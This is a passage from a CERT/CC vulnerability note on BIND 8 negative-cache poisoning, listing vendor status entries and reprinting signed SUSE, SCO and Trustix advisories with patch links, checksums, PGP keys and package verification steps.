have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ SuSE Inc.\n\nNotified: October 21, 2003 Updated: December 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`______________________________________________________________________________ \n` \n`SUSE Security Announcement \n` \n`Package: bind8 \nAnnouncement-ID: SuSE-SA:2003:047 \nDate: Friday, Nov 28th 2003 15:30 MEST \nAffected products: 7.3, 8.0, 8.1, 8.2 \nVulnerability Type: cache poisoning/denial-of-service \nSeverity (1-10): 5 \nSUSE default package: yes \nCross References: CAN-2003-0914` \n \n`Content of this advisory: \n1) security vulnerability resolved:` \n`- caching negative answers \nproblem description, discussion, solution and upgrade information` \n`2) pending vulnerabilities, solutions, workarounds: \n- ethereal \n- KDE \n- mc \n- apache1/2 \n- gpg \n- freeradius \n- xscreensaver \n- screen \n- mod_gzip \n- gnpan` \n`3) standard appendix (further information) \n` \n`______________________________________________________________________________ \n` \n`1) problem description, brief discussion, solution, upgrade information \n` \n`To resolve IP addresses to host and domain names and vice versa the \nDNS service needs to be consulted. The most popular DNS software is \nthe BIND8 and BIND9 suite. The BIND8 code is vulnerable to a remote \ndenial-of-service attack by poisoning the cache with authoritative \nnegative responses that should not be accepted otherwise. \nTo execute this attack a name-server needs to be under malicious \ncontrol and the victim's bind8 has to query this name-server. \nThe attacker can set a high TTL value to keep his negative record as \nlong as possible in the cache of the victim. For this time the clients \nof the attacked site that rely on the bind8 service will not be able \nto reach the domain specified in the negative record. \nThese records should disappear after the time-interval (TTL) elapsed.` \n \n`There is no temporary workaround for this bug. \n` \n`To make this update effective run \"rcnamed restart\" as root please. \n` \n`Please download the update package for your distribution and verify its \nintegrity by the methods listed in section 3) of this announcement. \nThen, install the package using the command \"rpm -Fhv file.rpm\" to apply \nthe update. \nOur maintenance customers are being notified individually. The packages \nare being offered to install from the maintenance web.` \n \n \n`Intel i386 Platform: \n` \n`SuSE-8.2: \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/bind8-8.3.4-64.i586.rpm>` \n`3d44d46f0e8397c69d53e96aba9fbd6d \npatch rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/bind8-8.3.4-64.i586.patch.rpm>` \n`cce1df09a0b6fb5cbbddcc462f055c64 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/bind8-8.3.4-64.src.rpm>` \n`a980a0eca79de02f135fce1cbe84ee22 \n` \n`SuSE-8.1: \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/bind8-8.2.4-336.i586.rpm>` \n`4a46d0560eac1ca5de77c12f8abe4952 \npatch rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/bind8-8.2.4-336.i586.patch.rpm>` \n`c8020302f6f161e9d86a3f1615304a23 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/bind8-8.2.4-336.src.rpm>` \n`c9ee184cbd1f1722c94de9fd66f11801 \n` \n`SuSE-8.0: \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/bind8-8.2.4-334.i386.rpm>` \n`f739fdb03a7df6685e0aa026f98a0389 \npatch rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/bind8-8.2.4-334.i386.patch.rpm>` \n`a3de26e06b689d29b4b4b08c04fa32f4 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/bind8-8.2.4-334.src.rpm>` \n`85d8d9fee3c8a029263777a45b4af011 \n` \n`SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/n2/bind8-8.2.4-334.i386.rpm>` \n`381c2b6f805ca30d0fefc98afaee9ba0 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/bind8-8.2.4-334.src.rpm>` \n`97a87469cfb573bdd89f8f3a2c02264f \n` \n \n \n`Sparc Platform: \n` \n`SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n2/bind8-8.2.4-128.sparc.rpm>` \n`c08454b933ed2365d9d2ab1322803af6 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/bind8-8.2.4-128.src.rpm>` \n`827a7f56273c7a25ac40ffba728e9150 \n` \n \n \n`PPC Power PC Platform: \n` \n`SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n2/bind8-8.2.4-243.ppc.rpm>` \n`12f1f205c08449e945c8ad344a8e3b41 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/bind8-8.2.4-243.src.rpm>` \n`177093e76b3b8d2679089a1ab1c46d0e \n` \n`______________________________________________________________________________ \n` \n`2) Pending vulnerabilities in SUSE Distributions and Workarounds: \n` \n`- ethereal \nA new official version of ethereal, a network traffic analyzer, was \nreleased to fix various security-related problems. \nAn update package is currently being tested and will be released \nas soon as possible.` \n \n`- KDE \nNew KDE packages are currently being tested. These packages fixes \nseveral vulnerabilities:` \n`+ remote root compromise (CAN-2003-0690) \n+ weak cookies (CAN-2003-0692) \n+ SSL man-in-the-middle attack \n+ information leak through HTML-referrer (CAN-2003-0459) \n+ wrong file permissions of config files` \n`The packages will be release as soon as testing is finished. \n` \n`- mc \nBy using a special combination of links in archive-files it is possible \nto execute arbitrary commands while mc tries to open it in its VFS. \nThe packages are currently tested and will be release as soon as \npossible.` \n \n`- apache1/2 \nThe widely used HTTP server apache has several security vulnerabilities:` \n`- locally exploitable buffer overflow in the regular expression code. \nThe attacker must be able to modify .htaccess or httpd.conf. \n(affects: mod_alias and mod_rewrite)` \n`- under some circumstances mod_cgid will output its data to the \nwrong client (affects: apache2)` \n`The new packages are available on our FTP servers. \n` \n \n`- gpg \nIn GnuPG version 1.0.2 a new code for ElGamal was introduced. \nThis code leads to an attack on users who use ElGamal keys for \nsigning. It is possible to reconstruct the private ElGamal key \nby analyzing a public ElGamal signature. \nPlease note that the ElGamal algorithm is seldomly used and GnuPG \ndisplays several warnings when generating ElGamal signature keys. \nThe default key generation process in GnuPG will create a DSA signature \nkey and an ElGamal subkey for _encryption only_. These keys are not \naffected by this vulnerability. \nAnyone using ElGamal signature keys (type 20, check fourth field of \n\"gpg --list-keys --with-colon\" output) should revoke them.` \n \n`- freeradius \nTwo vulnerabilities were found in the FreeRADIUS package. \nThe remote denial-of-service attack bug was fixed and new packages \nwill be released as soon as testing was successfully finished. \nThe other bug is a remote buffer overflow in the module rlm_smb. \nWe do not ship this module and will fix it for future releases.` \n \n`- xscreensaver \nThe well known screen-saver for X is vulnerable to several local \ntmp file attacks as well as a crash when verifying a password. \nOnly SuSE Linux 9.0 products are affected. \nThe new packages are available on our FTP servers.` \n \n`- screen \nA buffer overflow in screen was reported. Since SuSE Linux 8.0 \nwe do not ship screen with the s-bit anymore. An update package \nwill be released for 7.3 as soon as possible.` \n \n`- mod_gzip \nThe apache module mod_gzip is vulnerable to remote code execution \nwhile running in debug-mode. We do not ship this module in debug-mode \nbut future versions will include the fix.` \n \n`- gnpan \nA remote denial-of-service attack can be run against the GNOME \nnews-reader program gnpan. This bug affects SuSE Linux 8.0, 8.1, 8.2. \nUpdate packages are available on our FTP servers.` \n \n`______________________________________________________________________________ \n` \n`3) standard appendix: authenticity verification, additional information \n` \n`- Package authenticity verification: \n` \n`SUSE update packages are available on many mirror ftp servers all over \nthe world. While this service is being considered valuable and important \nto the free and open source software community, many users wish to be \nsure about the origin of the package and its content before installing \nthe package. There are two verification methods that can be used \nindependently from each other to prove the authenticity of a downloaded \nfile or rpm package: \n1) md5sums as provided in the (cryptographically signed) announcement. \n2) using the internal gpg signatures of the rpm package.` \n \n`1) execute the command \nmd5sum <name-of-the-file.rpm>` \n`after you downloaded the file from a SUSE ftp server or its mirrors. \nThen, compare the resulting md5sum with the one that is listed in the \nannouncement. Since the announcement containing the checksums is \ncryptographically signed (usually using the key security@suse.de), \nthe checksums show proof of the authenticity of the package. \nWe disrecommend to subscribe to security lists which cause the \nemail message containing the announcement to be modified so that \nthe signature does not match after transport through the mailing \nlist software. \nDownsides: You must be able to verify the authenticity of the \nannouncement in the first place. If RPM packages are being rebuilt \nand a new version of a package is published on the ftp server, all \nmd5 sums for the files are useless.` \n \n`2) rpm package signatures provide an easy way to verify the authenticity \nof an rpm package. Use the command` \n`rpm -v --checksig <file.rpm> \nto verify the signature of the package, where <file.rpm> is the \nfilename of the rpm package that you have downloaded. Of course, \npackage authenticity verification can only target an un-installed rpm \npackage file. \nPrerequisites:` \n`a) gpg is installed \nb) The package is signed using a certain key. The public part of this` \n`key must be installed by the gpg program in the directory \n~/.gnupg/ under the user's home directory who performs the \nsignature verification (usually root). You can import the key \nthat is used by SUSE in rpm packages for SUSE Linux by saving \nthis announcement to a file (\"announcement.txt\") and \nrunning the command (do \"su -\" to be root):` \n`gpg --batch; gpg < announcement.txt | gpg --import \nSUSE Linux distributions version 7.1 and thereafter install the \nkey \"build@suse.de\" upon installation or upgrade, provided that \nthe package gpg is installed. The file containing the public key \nis placed at the top-level directory of the first CD (pubring.gpg) \nand at ``<ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de>`` .` \n \n \n`- SUSE runs two security mailing lists to which any interested party may \nsubscribe:` \n \n`suse-security@suse.com \n- general/linux/SUSE security discussion.` \n`All SUSE security announcements are sent to this list. \nTo subscribe, send an email to` \n`<suse-security-subscribe@suse.com>. \n` \n`suse-security-announce@suse.com \n- SUSE's announce-only mailing list.` \n`Only SUSE's security announcements are sent to this list. \nTo subscribe, send an email to` \n`<suse-security-announce-subscribe@suse.com>. \n` \n`For general information or the frequently asked questions (faq) \nsend mail to:` \n`<suse-security-info@suse.com> or \n<suse-security-faq@suse.com> respectively.` \n \n`===================================================================== \nSUSE's security contact is <security@suse.com> or <security@suse.de>. \nThe <security@suse.de> public key is listed below. \n=====================================================================` \n`______________________________________________________________________________ \n` \n`The information in this advisory may be distributed or reproduced, \nprovided that the advisory is not modified in any way. In particular, \nit is desired that the clear-text signature shows proof of the \nauthenticity of the text. \nSUSE Linux AG makes no warranties of any kind whatsoever with respect \nto the information contained in this security advisory.` \n \n`Type Bits/KeyID Date User ID \npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de> \npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de> \n` \n`- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`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` \n`ORrNjq9pYWlrxsEn6ApsG7JJbM2besW1PkdEoxak74z1senh36m5jQvVjA3U4xq1` \n`wwylxadmmJaJHzeiLfb7G1ZRjZTsB7fyYxqDzMVul6o9BSwO/1XsIAnV1uuITAQY \nEQIADAUCOe70kgUJA8JnAAAKCRCoTtronIAKyksiAJsFB3/77SkH3JlYOGrEe1Ol \n0JdGwACeKTttgeVPFB+iGJdiwQlxasOfuXyITAQYEQIADAUCPGqpWQUJCgCCxwAK \nCRCoTtronIAKyofBAKCSZM2UFyta/fe9WgITK9I5hbxxtQCfX+0ar2CZmSknn3co \nSPihn1+OBNyZAQ0DNuEtBAAAAQgAoCRcd7SVZEFcumffyEwfLTcXQjhKzOahzxpo \nomuF+HIyU4AGq+SU8sTZ/1SsjhdzzrSAfv1lETACA+3SmLr5KV40Us1w0UC64cwt \nA46xowVq1vMlH2Lib+V/qr3b1hE67nMHjysECVx9Ob4gFuKNoR2eqnAaJvjnAT8J \n/LoUC20EdCHUqn6v+M9t/WZgC+WNR8cq69uDy3YQhDP/nIan6fm2uf2kSV9A7ZxE \nGrwsWl/WX5Q/sQqMWaU6r4az98X3z90/cN+eJJ3vwtA+rm+nxEvyev+jaLuOQBDf \nebh/XA4FZ35xmi+spdiVeJH4F/ubaGlmj7+wDOF3suYAPSXT2QAFEbQlU3VTRSBT \nZWN1cml0eSBUZWFtIDxzZWN1cml0eUBzdXNlLmRlPokBFQMFEDbhLUfkWLKHsco8 \nRQEBVw4H/1vIdiOLX/7hdzYaG9crQVIk3QwaB5eBbjvLEMvuCZHiY2COUg5QdmPQ \n8SlWNZ6k4nu1BLcv2g/pymPUWP9fG4tuSnlUJDrWGm3nhyhAC9iudP2u1YQY37Gb \nB6NPVaZiYMnEb4QYFcqv5c/r2ghSXUTYk7etd6SW6WCOpEqizhx1cqDKNZnsI/1X \n11pFcO2N7rc6byDBJ1T+cK+F1Ehan9XBt/shryJmv04nli5CXQMEbiqYYMOu8iaA \n8AWRgXPCWqhyGhcVD3LRhUJXjUOdH4ZiHCXaoF3zVPxpeGKEQY8iBrDeDyB3wHmj \nqY9WCX6cmogGQRgYG6yJqDalLqrDOdmJARUDBRA24S0Ed7LmAD0l09kBAW04B/4p \nWH3f1vQn3i6/+SmDjGzUu2GWGq6Fsdwo2hVM2ym6CILeow/K9JfhdwGvY8LRxWRL \nhn09j2IJ9P7H1Yz3qDf10AX6V7YILHtchKT1dcngCkTLmDgC4rs1iAAl3f089sRG \nBafGPGKv2DQjHfR1LfRtbf0P7c09Tkej1MP8HtQMW9hPkBYeXcwbCjdrVGFOzqx+ \nAvvJDdT6a+oyRMTFlvmZ83UV5pgoyimgjhWnM1V4bFBYjPrtWMkdXJSUXbR6Q7Pi \nRZWCzGRzwbaxqpl3rK/YTCphOLwEMB27B4/fcqtBzgoMOiaZA0M5fFoo54KgRIh0 \nzinsSx2OrWgvSiLEXXYKiEYEEBECAAYFAjseYcMACgkQnkDjEAAKq6ROVACgjhDM \n/3KM+iFjs5QXsnd4oFPOnbkAnjYGa1J3em+bmV2aiCdYXdOuGn4ZiQCVAwUQN7c7 \nwhaQN/7O/JIVAQEB+QP/cYblSAmPXxSFiaHWB+MiUNw8B6ozBLK0QcMQ2YcL6+Vl \nD+nSZP20+Ja2nfiKjnibCv5ss83yXoHkYk2Rsa8foz6Y7tHwuPiccvqnIC/c9Cvz \ndbIsdxpfsi0qWPfvX/jLMpXqqnPjdIZErgxpwujas1n9016PuXA8K3MJwVjCqSKI \nRgQQEQIABgUCOhpCpAAKCRDHUqoysN/3gCt7AJ9adNQMbmA1iSYcbhtgvx9ByLPI \nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE= \n=LRKC \n- -----END PGP PUBLIC KEY BLOCK----- \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`iQEVAwUBP8dgT3ey5gA9JdPZAQH5LQf+MA/cLvB14QAZFTXwtqB2tNpcotkmJyF8 \noWbsWl7EnsF6hlR7tr3Hjk2bvpzE8yLShtckMvtVAy1Xj29fvWpHjtZM1TEfjWSk \nXgxeJ4n5HvKMjyOYopNgdbdQCvcr8v4eWjVA9ekK/WXikIXRWsiN9PhT6c0NQxfA \ntO7zHQYHhGwH4jae8aD6EPWJhc1sLzQMC4XCkFxIFlZouAtVr7rShDNUamKcaV63 \n5c1uhewBorqfD7o8x85OCXcAA9WEnEs7t/mJnHC0hLgYF259YxX3HtXrj18jnD8/ \nYvVnzfkQwDxRY3qALRjAfd05QGOGir75fSBCtofP2lDPg8igRFo8UQ== \n=fX7r \n-----END PGP SIGNATURE----- \n` \n`Bye, \nThomas` \n`-- \nThomas Biege <thomas@suse.de>, SUSE LINUX AG, Security Support & Auditing` \n`\"lynx -source ``<http://www.suse.de/~thomas/contact/thomas.asc>`` | pgp -fka\" \nKey fingerprint = 51 AD B9 C7 34 FC F2 54 01 4A 1C D4 66 64 09 83` \n`-- \n... stay with me, safe and ignorant, go back to sleep...` \n`- Maynard James Keenan \n`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Sun Microsystems Inc.\n\nNotified: October 21, 2003 Updated: December 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`All supported releases of Solaris (ie Solaris 7, 8 and 9) \nare affected by this issue. We have published a Sun Alert which is \navailable from: \n``<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/57434>`` \n`\n\n`It describes a possible workaround that can be used until official patches \nare released. \n` \n`Supported Cobalt platforms and Sun Linux 5.0 are also affected. A Sun \nAlert will be published and will be available from: \n``<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/>`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ The SCO Group (SCO UnixWare)\n\nNotified: October 21, 2003 Updated: December 03, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nUnixWare 7.1.3: Unaffected current version of bind is 9.2.1. \nOpen UNIX 8.0.0 (aka UnixWare 7.1.2) Unaffected current version of bind is 9.2.0. \nUnixWare 7.1.1: Affected. Fix will be at \n\n\n \n<ftp://ftp.sco.com/pub/updates/UnixWare/CSSA-2003-SCO.33> \nOpenServer: fix in-progress \n \nOpenLinux: also fix in-progress \n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n` \n \n`______________________________________________________________________________ \n` \n`SCO Security Advisory \n` \n`Subject:UnixWare 7.1.1 : Bind: cache poisoning BIND 8 prior to 8.3.7 and BIND 8.4.x prior 8.4.2 \nAdvisory number: CSSA-2003-SCO.33 \nIssue date: 2003 December 01 \nCross reference: sr886768 fz528464 erg712479 CAN-2003-0914 \n______________________________________________________________________________ \n` \n \n`1. Problem Description \n` \n`UnixWare 7.1.3 is unaffected by this issue because the \nversion of bind included in UnixWare 7.1.3 is 9.2.1.` \n \n`Open UNIX is also unaffected by this issue because the version \nof bind in Open UNIX 8.0.0 is 9.1.0.` \n \n`CERT/CC Incident Note VU#734644 \n` \n`BIND is an implementation of the Domain Name System (DNS) \nprotocols. Successful exploitation of this vulnerability \nmay result in a temporary denial of service.` \n \n`The Common Vulnerabilities and Exposures project (cve.mitre.org) \nhas assigned the name CAN-2003-0914 to this issue.` \n \n \n`2. Vulnerable Supported Versions \n` \n`SystemBinaries \n---------------------------------------------------------------------- \nUnixWare 7.1.1 /usr/sbin/addr` \n`/usr/sbin/dig \n/usr/sbin/dnskeygen \n/usr/sbin/dnsquery \n/usr/sbin/host \n/usr/sbin/in.named \n/usr/sbin/irpd \n/usr/sbin/mkservdb \n/usr/sbin/named-bootconf \n/usr/sbin/named-bootconf.pl \n/usr/sbin/named-xfer \n/usr/sbin/ndc \n/usr/sbin/nslookup \n/usr/sbin/nsupdate` \n \n`3. Solution \n` \n`The proper solution is to install the latest packages. \n` \n \n`4. UnixWare 7.1.1 \n` \n`4.1 Location of Fixed Binaries \n` \n`<ftp://ftp.sco.com/pub/updates/UnixWare/CSSA-2003-SCO.33> \n` \n \n`4.2 Verification \n` \n`MD5 (erg712479.Z) = c1faea2a6a1da952e88c5123f88a2f89 \n` \n`md5 is available for download from \n<ftp://ftp.sco.com/pub/security/tools>` \n \n \n`4.3 Installing Fixed Binaries \n` \n`Upgrade the affected binaries with the following sequence: \n` \n`Unknown installation method \n` \n \n`5. References \n` \n`Specific references for this advisory: \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0914>` \n \n`SCO security resources: \n<http://www.sco.com/support/security/index.html>` \n \n`This security fix closes SCO incidents sr886768 fz528464 \nerg712479.` \n \n \n`6. Disclaimer \n` \n`SCO is not responsible for the misuse of any of the information \nwe provide on this website and/or through our security \nadvisories. Our advisories are a service to our customers \nintended to promote secure installation and use of SCO \nproducts.` \n`______________________________________________________________________________ \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.3 (SCO/UNIX_SVR5) \n` \n`iD8DBQE/y8gZaqoBO7ipriERAkRQAKCQ+f4Q5Etfz8L83tr/vGGRzI1kYQCgl/hK \ng7YQSKd9TDnf59KkuFTbrBQ= \n=XyVk \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Trustix Secure Linux\n\nUpdated: December 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nPlease see `<http://www.trustix.org/errata/misc/2003/TSL-2003-0044-bind.asc.txt>`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- -------------------------------------------------------------------------- \nTrustix Secure Linux Security Advisory #2003-0044 \n` \n`Package name: bind \nSummary: negative cache sec. fix \nDate: 2003-11-27 \nAffected versions: TSL 1.2, 1.5 \n` \n`- -------------------------------------------------------------------------- \nPackage description:` \n`BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain \nName System) protocols. BIND includes a DNS server (named), which resolves \nhost names to IP addresses, and a resolver library (routines for applications \nto use when interfacing with DNS). A DNS server allows clients to name \nresources or objects and share the information with other network machines. \nThe named DNS server can be used on workstations as a caching name server, \nbut is generally only needed on one machine for an entire network. Note that \nthe configuration files for making BIND act as a simple caching nameserver \nare included in the caching-nameserver package.Install the bind package if \nyou need a DNS server for your network. If you want bind to act a caching \nname server, you will also need to install the caching-nameserver package.` \n \n`Problem description: \nAccording the the bind announcment dated Thu, 27 Nov 2003, the new upstream \nbind 8.3.7 fixes a security problem:` \n \n`Security Fix: Negative Cache Poison Fix. \n` \n`This issue has been addressed in these updates. \n` \n \n`Action: \nWe recommend that all systems with this package installed be upgraded. \nPlease note that if you do not need the functionality provided by this \npackage, you may want to remove it from your system.` \n \n \n`Location: \nAll TSL updates are available from \n<URI:``<http://http.trustix.org/pub/trustix/updates/>``> \n<URI:``<ftp://ftp.trustix.org/pub/trustix/updates/>``>` \n \n \n`About Trustix Secure Linux: \nTrustix Secure Linux is a small Linux distribution for servers. With focus \non security and stability, the system is painlessly kept safe and up to \ndate from day one using swup, the automated software updater.` \n \n \n`Automatic updates: \nUsers of the SWUP tool can enjoy having updates automatically \ninstalled using 'swup --upgrade'.` \n \n \n`Public testing: \nThese packages have been available for public testing for some time. \nIf you want to contribute by testing the various packages in the \ntesting tree, please feel free to share your findings on the \ntsl-discuss mailinglist. \nThe testing tree is located at \n<URI:``<http://tsldev.trustix.org/cloud/>``>` \n \n`You may also use swup for public testing of updates: \n` \n`site { \nclass = 0 \nlocation = \"``<http://tsldev.trustix.org/cloud/rdfs/latest.rdf>``\" \nregexp = \".*\"` \n`} \n` \n \n`Questions? \nCheck out our mailing lists: \n<URI:``<http://www.trustix.org/support/>``>` \n \n \n`Verification: \nThis advisory along with all TSL packages are signed with the TSL sign key. \nThis key is available from: \n<URI:``<http://www.trustix.org/TSL-SIGN-KEY>``>` \n \n`The advisory itself is available from the errata pages at \n<URI:``<http://www.trustix.org/errata/trustix-1.2/>``> and \n<URI:``<http://www.trustix.org/errata/trustix-1.5/>``> \nor directly at \n<URI:``<http://www.trustix.org/errata/misc/2003/TSL-2003-0044-bind.asc.txt>``>` \n \n \n`MD5sums of the packages: \n- -------------------------------------------------------------------------- \n0e109cf7c3ec04f6adfbd3dddcbc94d3 ./1.5/srpms/bind-8.2.6-3tr.src.rpm \nb353b0517f50b18c6f2bb180151ad671 ./1.5/rpms/bind-utils-8.2.6-3tr.i586.rpm \n872ed56a159fa9e8404e30c6f6afdce0 ./1.5/rpms/bind-devel-8.2.6-3tr.i586.rpm \nade76318032b7a95f2426edcf10e75a8 ./1.5/rpms/bind-8.2.6-3tr.i586.rpm \n0e109cf7c3ec04f6adfbd3dddcbc94d3 ./1.2/srpms/bind-8.2.6-3tr.src.rpm \ndd01d1afce4afd60b08857706f2150ee ./1.2/rpms/bind-utils-8.2.6-3tr.i586.rpm \n590118f78a8cddbaf8dc8c142ef57cb3 ./1.2/rpms/bind-devel-8.2.6-3tr.i586.rpm \nca631fbe974a6926c8ba32b46c3ac7d4 ./1.2/rpms/bind-8.2.6-3tr.i586.rpm \n- -------------------------------------------------------------------------- \n` \n \n`TSL Security Team \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.2 (GNU/Linux) \n` \n`iD8DBQE/xcQCi8CEzsK9IksRArTyAKCpbt7Z0zr7l/liVtKbiuGOQjBBXACgk74q \nRpVcOV3YngzwUxZcJLdDuls= \n=PazY \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Check Point\n\nNotified: October 21, 2003 Updated: October 27, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nCheck Point products are not vulnerable to this issue.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Cray Inc.\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nCray Inc. is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Hitachi\n\nNotified: 